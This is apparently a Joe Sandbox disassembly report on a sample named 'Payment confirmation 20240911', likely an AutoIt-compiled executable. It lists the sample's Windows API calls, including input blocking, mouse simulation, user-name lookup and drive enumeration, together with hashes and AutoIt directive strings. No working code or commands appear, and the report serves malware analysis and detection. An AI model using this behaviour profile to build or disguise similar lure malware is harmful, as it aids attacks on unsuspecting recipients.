                                          • Instruction Fuzzy Hash: C3E0E676004511EFE72A2B54EC04D777BFDEF04355B11C459F59981474D7615CD0DB10
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 01308E41
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 01308E4A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 71e39cb1ef460e05925b0877153400ca70281d81d658af4146436b2b7af2899a
                                          • Instruction ID: 9027973d7f4c3151f9929a9c656fbad478922589e92f071191d93a8740e8a417
                                          • Opcode Fuzzy Hash: 71e39cb1ef460e05925b0877153400ca70281d81d658af4146436b2b7af2899a
                                          • Instruction Fuzzy Hash: 29B09271244A08ABEA102BE1E80DB883F6CEB08B62F108010F65D440648B6354508F99
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID:
                                          • API String ID: 3964851224-0
                                          • Opcode ID: 176be40cd88685623f1e01295918f9f59ceb47ac33369deccd43989511e9597e
                                          • Instruction ID: 39c26d9a4681709766e9f985b59fa4895dded59a02cad3d1b4c9bda564c4145b
                                          • Opcode Fuzzy Hash: 176be40cd88685623f1e01295918f9f59ceb47ac33369deccd43989511e9597e
                                          • Instruction Fuzzy Hash: D6925B70618342CFD724DF18C494B6AFBE1BF88308F54896DEA8A8B391D775E845CB52
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 84b644245dabdaa9ec8aff127d7c666b47b79cdc5d53dde6d31c501788fff778
                                          • Instruction ID: 6c0c018f67b4271848f9e1fb1250115e92f3e04e70cd9e6985b3cf59cfd9ed64
                                          • Opcode Fuzzy Hash: 84b644245dabdaa9ec8aff127d7c666b47b79cdc5d53dde6d31c501788fff778
                                          • Instruction Fuzzy Hash: D0B1E120D2AF414DD63796398831336B65CBFBB2D5F91D71BFC2A74D1AEB2185834280
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: BlockInput
                                          • String ID:
                                          • API String ID: 3456056419-0
                                          APIs
                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 01327DF8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: mouse_event
                                          • String ID:
                                          • API String ID: 2434400541-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: NameUser
                                          • String ID:
                                          • API String ID: 2645101109-0
                                          APIs
                                          • GetProcessHeap.KERNEL32(01306AE9,013967D8,00000014), ref: 0130A937
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: HeapProcess
                                          • String ID:
                                          • API String ID: 54951025-0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 0133A7A5
                                          • DeleteObject.GDI32(00000000), ref: 0133A7B7
                                          • DestroyWindow.USER32 ref: 0133A7C5
                                          • GetDesktopWindow.USER32 ref: 0133A7DF
                                          • GetWindowRect.USER32(00000000), ref: 0133A7E6
                                          • SetRect.USER32 ref: 0133A927
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0133A937
                                          • CreateWindowExW.USER32 ref: 0133A97F
                                          • GetClientRect.USER32(00000000,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0133A98B
                                          • CreateWindowExW.USER32 ref: 0133A9C5
                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0133A9E7
                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0133A9FA
                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0133AA05
                                          • GlobalLock.KERNEL32(00000000), ref: 0133AA0E
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000), ref: 0133AA1D
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0133AA26
                                          • CloseHandle.KERNEL32(00000000), ref: 0133AA2D
                                          • GlobalFree.KERNEL32(00000000), ref: 0133AA38
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000), ref: 0133AA4A
                                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0136D9BC,00000000), ref: 0133AA60
                                          • GlobalFree.KERNEL32(00000000), ref: 0133AA70
                                          • CopyImage.USER32 ref: 0133AA96
                                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0133AAB5
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020), ref: 0133AAD7
                                          • ShowWindow.USER32(00000004), ref: 0133ACC4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                          • String ID: $AutoIt v3$DISPLAY$static
                                          • API String ID: 2211948467-2373415609
                                          APIs
                                          • SetTextColor.GDI32(?,00000000), ref: 0134D0EB
                                          • GetSysColorBrush.USER32 ref: 0134D11C
                                          • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,0135F352,?,?,?), ref: 0134D128
                                          • SetBkColor.GDI32(?,000000FF), ref: 0134D142
                                          • SelectObject.GDI32(?,00000000), ref: 0134D151
                                          • InflateRect.USER32 ref: 0134D17C
                                          • GetSysColor.USER32(00000010,?,?,?,?,?,?,?,?,?,?,?,0135F352,?,?,?), ref: 0134D184
                                          • CreateSolidBrush.GDI32(00000000), ref: 0134D18B
                                          • FrameRect.USER32 ref: 0134D19A
                                          • DeleteObject.GDI32(00000000), ref: 0134D1A1
                                          • InflateRect.USER32 ref: 0134D1EC
                                          • FillRect.USER32 ref: 0134D21E
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0134D249
                                            • Part of subcall function 0134D385: GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,0134D0B5,?,?,00000000,?), ref: 0134D3BE
                                            • Part of subcall function 0134D385: SetTextColor.GDI32(?,?), ref: 0134D3C2
                                            • Part of subcall function 0134D385: GetSysColorBrush.USER32 ref: 0134D3D8
                                            • Part of subcall function 0134D385: GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,0134D0B5,?,?,00000000,?,?), ref: 0134D3E3
                                            • Part of subcall function 0134D385: GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0134D0B5,?,?,00000000,?,?), ref: 0134D400
                                            • Part of subcall function 0134D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0134D40E
                                            • Part of subcall function 0134D385: SelectObject.GDI32(?,00000000), ref: 0134D41F
                                            • Part of subcall function 0134D385: SetBkColor.GDI32(?,00000000), ref: 0134D428
                                            • Part of subcall function 0134D385: SelectObject.GDI32(?,?), ref: 0134D435
                                            • Part of subcall function 0134D385: InflateRect.USER32 ref: 0134D454
                                            • Part of subcall function 0134D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0134D46B
                                            • Part of subcall function 0134D385: GetWindowLongW.USER32(00000000,000000F0), ref: 0134D480
                                            • Part of subcall function 0134D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0134D4A8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                          • String ID:
                                          • API String ID: 3521893082-0
                                          APIs
                                          • DestroyWindow.USER32 ref: 012E4956
                                          • DeleteObject.GDI32(00000000), ref: 012E4998
                                          • DeleteObject.GDI32(00000000), ref: 012E49A3
                                          • DestroyIcon.USER32(00000000), ref: 012E49AE
                                          • DestroyWindow.USER32 ref: 012E49B9
                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0135E179
                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0135E1B2
                                          • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0135E5E0
                                            • Part of subcall function 012E49CA: InvalidateRect.USER32(?,00000000,00000001), ref: 012E4A23
                                          • SendMessageW.USER32 ref: 0135E627
                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0135E63E
                                          • ImageList_Destroy.COMCTL32(00000000), ref: 0135E654
                                          • ImageList_Destroy.COMCTL32(00000000), ref: 0135E65F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                          • String ID: 0
                                          • API String ID: 464785882-4108050209
                                          APIs
                                          • DestroyWindow.USER32 ref: 0133A42A
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0133A4E9
                                          • SetRect.USER32 ref: 0133A527
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0133A539
                                          • CreateWindowExW.USER32 ref: 0133A57F
                                          • GetClientRect.USER32(00000000,?,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0133A58B
                                          • CreateWindowExW.USER32 ref: 0133A5CF
                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0133A5DE
                                          • GetStockObject.GDI32(00000011), ref: 0133A5EE
                                          • SelectObject.GDI32(00000000,00000000), ref: 0133A5F2
                                          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 0133A602
                                          • GetDeviceCaps.GDI32(00000000,0000005A,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 0133A60B
                                          • DeleteDC.GDI32(00000000), ref: 0133A614
                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0133A642
                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 0133A659
                                          • CreateWindowExW.USER32 ref: 0133A694
                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0133A6A8
                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 0133A6B9
                                          • CreateWindowExW.USER32 ref: 0133A6E9
                                          • GetStockObject.GDI32(00000011), ref: 0133A6F4
                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0133A6FF
                                          • ShowWindow.USER32(00000004), ref: 0133A709
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                          • API String ID: 2910397461-517079104
                                          • Opcode ID: e0f5843ddd1a3754e923450362187042855548c6e4b9d087056b51574f20a395
                                          • Instruction ID: a249cb82d5deecdf71597c9d6b9571a18c573aec751c9b83f3d510802c4aa89b
                                          • Opcode Fuzzy Hash: e0f5843ddd1a3754e923450362187042855548c6e4b9d087056b51574f20a395
                                          • Instruction Fuzzy Hash: CBA17BB1A50215BFEB24DBA9DC49FAE7BBDEB44714F008114FA54A72D0D7B4AD00CB64
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0132E45E
                                          • GetDriveTypeW.KERNEL32(?,0137DC88,?,\\.\,0137DBF0), ref: 0132E54B
                                          • SetErrorMode.KERNEL32(00000000,0137DC88,?,\\.\,0137DBF0), ref: 0132E6B1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DriveType
                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                          • API String ID: 2907320926-4222207086
                                          • Opcode ID: 6334861fdf9e1ecefc072be868507db0786d6c67cb64b468c41c16283c663695
                                          • Instruction ID: f010dbac6da5d74ecf232d0074e149bebedc8f7adc353de0814d2d27ea890d96
                                          • Opcode Fuzzy Hash: 6334861fdf9e1ecefc072be868507db0786d6c67cb64b468c41c16283c663695
                                          • Instruction Fuzzy Hash: A651F470218716EBCB20FF2AD89683AB7D4BB5462CF50893DE44A9B750E730DD49CB42
                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0134C598
                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0134C64E
                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 0134C669
                                          • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0134C925
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window
                                          • String ID: 0$`"u
                                          • API String ID: 2326795674-2270789441
                                          • Opcode ID: 72f7f12f6d1740b3d66796a62374924cea14a0c3dd27414a7d6ace34f1fcc5c2
                                          • Instruction ID: 75edb275439370ed96d512496e4098e0ef506e482b8ca9559c0f5beb8f455d3e
                                          • Opcode Fuzzy Hash: 72f7f12f6d1740b3d66796a62374924cea14a0c3dd27414a7d6ace34f1fcc5c2
                                          • Instruction Fuzzy Hash: 58F1E571206341AFF721CF28C884BAABFE8FF45758F085529F695D62A1C774E844CB52
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                          • API String ID: 1038674560-86951937
                                          • Opcode ID: dc566ef2ffa8f718389fa98a4171baeb11d3ab2b9564f2d55c22f7360c973347
                                          • Instruction ID: cf4ae9c0c66392ee32358e94dc77e73842bab631ae8debf445adde6ca324aeda
                                          • Opcode Fuzzy Hash: dc566ef2ffa8f718389fa98a4171baeb11d3ab2b9564f2d55c22f7360c973347
                                          • Instruction Fuzzy Hash: 03614A7129070777DB26EAAD8C5AFBB37ECBF15748F440028FE41B6181EBA4C511C2A1
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 01346245
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
